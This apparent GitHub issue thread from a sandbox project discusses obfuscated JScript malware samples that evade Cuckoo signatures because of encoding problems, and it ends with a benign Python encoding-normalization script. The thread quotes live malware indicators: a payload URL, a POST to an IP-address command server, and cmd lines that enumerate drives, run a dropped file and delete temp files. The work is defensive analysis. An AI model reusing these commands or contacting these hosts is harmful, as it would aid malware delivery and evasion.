cuckoosandbox / community

Repository of modules and signatures contributed by the community

jsbeautifier with obfuscated code #331

Open Nwinternights opened 7 years ago

Nwinternights commented 7 years ago

Hi, I submitted this js md5(106398258b338bb9a0cbadebb99a7a8) with obfuscated code. The analysis ends with no special warnings (no HTTP GET for the payload) because it seems that jsbeautifier makes some mess or the JS contains invalid characters that wscript cannot parse. So after manually deobfuscating the js md5(5abc907b092c6c28f5455777b3304d66) I resubmitted it to cuckoo and the analysis gives me more warnings, even the payload and URL. Regards

before: https://www.reverse.it/sample/77f8919ca00d0aae72f8c0ba41f406ec9f21b47d07e0f460585beab53e72f9e1?environmentId=100
after: https://www.reverse.it/sample/0b78fbc00e5ca1f9113d90edc4e1a05577168bc2d561e0c111914daa8bcae6b6?environmentId=100

doomedraven commented 7 years ago

But are you sure that it is a jsbeautifier problem? If they had some bad chars or whatever, it won't execute correctly anyway, no, if there is no dropper which will remove it? Or am I missing something?

Nwinternights commented 7 years ago

Well, I dunno. The code is obfuscated and it seems that Windows cannot execute it, but if you try to submit both samples, on the first, if you look at the strings, it seems jsbeautifier didn't work and in the signature it comes out like Chinese chars (UTF-16): COleScript_Compile | type: JScript - script block script: 汪䭔䱓睆睭坶汨‽㈢㌵ ㅣ.... .. On the second sample I get this: COleScript_Compile | type: JScript - script block script: jlTKSLFwmwvWhln .... ... and it raises alerts.

Nwinternights commented 7 years ago

I didn't deobfuscate the js, I just beautified it:

Using a 10 seconds timeout, pass --timeout to specify another timeout in seconds
[info] Rewriting code...
[info] Preprocessing with uglify-js v3.0.24 (remove --preprocess to skip)...
[info] Replacing function A.prototype.B() (use --no-rewrite-prototype to skip)...
[info] Rewriting typeof calls (use --no-typeof-rewrite to skip)...
[info] Rewriting eval calls (use --no-eval-rewrite to skip)...
[info] Rewriting try/catch statements (use --no-catch-rewrite to skip)...
[info] Rewritten successfully.
[info] GET http://www.renenekuda.cz/images/r7.php?fOrWJdAUXn=tKkBTKXcGgrK&group=ITrar
[info] Returning HTTP 404 (Not found); use --download to try to download the payload

Nwinternights commented 7 years ago

@doomedraven any clues? Do you think it's a non-issue so I can close it?

doomedraven commented 7 years ago

So you mean without jsbeautifier it works and with it it doesn't? Explain a bit better, because your first post is confusing.

Nwinternights commented 7 years ago

:-) Yeah, I agree with you, it was a bit confusing. I'll try to be more clear:

1- One JS sample ---> cuckoo ---> no signatures.
2- Same JS sample --> jsbeautifier.org --> cuckoo -->> Signature matched

First JS sample: 8106398258b338bb9a0cbadebb99a7a8; same sample but with js beautifier: d726c700097ed1471491158552eda5e3. Seems like the COleScript_Compile uses UTF-16 instead of UTF-8... but I dunno if it's the main cause.

doomedraven commented 7 years ago

Hm, the case is interesting. I was looking a bit into it; the Google dev console can interpret it just fine, so we need to figure out what is wrong here. I saw a lot of people pointing out that it should be in ANSI, tried it and got the same result.

Nwinternights commented 7 years ago

I got another interesting case. (I'll try to be clear) :-) :-)

js.zip

The same file is with and without obfuscation. If you look at the code you'll see that the file does a lot of stuff such as:

- VmCheck / Evasion
- Post to https://185.159.82.54:7500/SS/lafamilia.php?add=stayoutofmyterritory&u=
- verify that the host replied with HTTP 200
- save the payload to disk fly.jse
- check the first two bytes of the payload to verify that it starts with the MZ magic number
- call cmd /U /Q /C cd /D : && dir /b/s/x >>%TEMP%\ for each drive
- call cmd \c start (which runs the dropped file)
- call cmd /U /Q /C del /Q/F %TEMP%\.exe && del /Q/F %TEMP%\.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\.log && del /Q/F %TEMP%\.jse
- open 0.

And some other "interesting" stuff

But if you submit both files you just have a signature that matches execution of JavaScript. If you look at the cuckoo js.py package you'll see that all files executed by wscript are also treated as JS. As a consequence, if you have a .jse, in the behaviour analysis you'll have = file.jse.js. Regards
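The thread keeps circling around one triage question: is the sample UTF-16 (with or without a BOM), UTF-8, or an ANSI code page, and is the CJK-looking string in the COleScript_Compile signature just ASCII source read two bytes at a time? The script below is an added example, not code from this thread or from the Cuckoo project. It sniffs the encoding of a script blob from its BOM or NUL-byte pattern, re-encodes it as BOM-less UTF-8 before it goes to a beautifier or sandbox, and flags decoded text that is mostly CJK-range code points as a likely mis-decode. The NUL and CJK thresholds and the cp1252 fallback are assumptions, and all inputs are constructed samples.

```python
import codecs
from typing import Dict, Tuple

# Constructed sample: a harmless JScript line using the variable name seen in the thread.
SCRIPT_TEXT = 'var jlTKSLFwmwvWhln = "hello";\r\n'

# Heuristic thresholds (assumptions, not taken from Cuckoo or jsbeautifier).
NUL_HIGH = 0.7      # share of NUL bytes expected in the "dead" byte lane of UTF-16 ASCII text
NUL_LOW = 0.1       # share of NUL bytes tolerated in the "live" lane
CJK_RATIO = 0.5     # share of CJK-range code points that marks a mis-decoded script


def sniff_encoding(data: bytes) -> str:
    """Guess the text encoding of a script blob.

    Order of checks: explicit BOM, then the NUL-byte pattern that BOM-less
    UTF-16 ASCII text leaves behind, then a UTF-8 trial decode, and finally
    cp1252 as a stand-in for a Windows "ANSI" code page (an assumption).
    """
    if data.startswith(codecs.BOM_UTF8):
        return "utf-8-sig"
    if data.startswith(codecs.BOM_UTF16_LE) or data.startswith(codecs.BOM_UTF16_BE):
        return "utf-16"   # Python's utf-16 codec consumes the BOM and picks the byte order
    head = data[:4096]
    if len(head) >= 4:
        even = head[0::2]
        odd = head[1::2]
        odd_nuls = odd.count(0) / len(odd)
        even_nuls = even.count(0) / len(even)
        if odd_nuls >= NUL_HIGH and even_nuls <= NUL_LOW:
            return "utf-16-le"
        if even_nuls >= NUL_HIGH and odd_nuls <= NUL_LOW:
            return "utf-16-be"
    try:
        data.decode("utf-8")
        return "utf-8"
    except UnicodeDecodeError:
        return "cp1252"


def normalize_script(data: bytes) -> Tuple[str, bytes]:
    """Return (detected encoding, the same script re-encoded as BOM-less UTF-8)."""
    enc = sniff_encoding(data)
    return enc, data.decode(enc).encode("utf-8")


def looks_misdecoded(text: str) -> bool:
    """Flag text that is mostly CJK-range code points, the symptom seen when ASCII
    JScript is read as UTF-16 (the COleScript_Compile string in the thread)."""
    if not text:
        return False
    cjk = sum(1 for ch in text if 0x3000 <= ord(ch) <= 0x9FFF)
    return cjk / len(text) >= CJK_RATIO


def build_samples() -> Dict[str, bytes]:
    """Constructed inputs: the same script saved five different ways, plus one ANSI file."""
    return {
        "utf-8": SCRIPT_TEXT.encode("utf-8"),
        "utf-8-sig": codecs.BOM_UTF8 + SCRIPT_TEXT.encode("utf-8"),
        "utf-16": codecs.BOM_UTF16_LE + SCRIPT_TEXT.encode("utf-16-le"),
        "utf-16-le": SCRIPT_TEXT.encode("utf-16-le"),
        "utf-16-be": SCRIPT_TEXT.encode("utf-16-be"),
        "cp1252": b'var s = "caf\xe9";\r\n',
    }


if __name__ == "__main__":
    for label, blob in build_samples().items():
        enc, utf8 = normalize_script(blob)
        print(f"{label:10s} -> detected {enc:10s} -> {utf8!r}")
    # What the sandbox log showed: the UTF-8 bytes of the script read as UTF-16LE.
    garbled = SCRIPT_TEXT.encode("utf-8").decode("utf-16-le")
    print("misdecoded view:", garbled, looks_misdecoded(garbled))
```

Run it on a suspect .js/.jse before submission; if `sniff_encoding` reports a UTF-16 variant, feed the UTF-8 output of `normalize_script` to the beautifier and sandbox instead of the original bytes, and keep the original extension in the filename so the sandbox package choice is visible in the report.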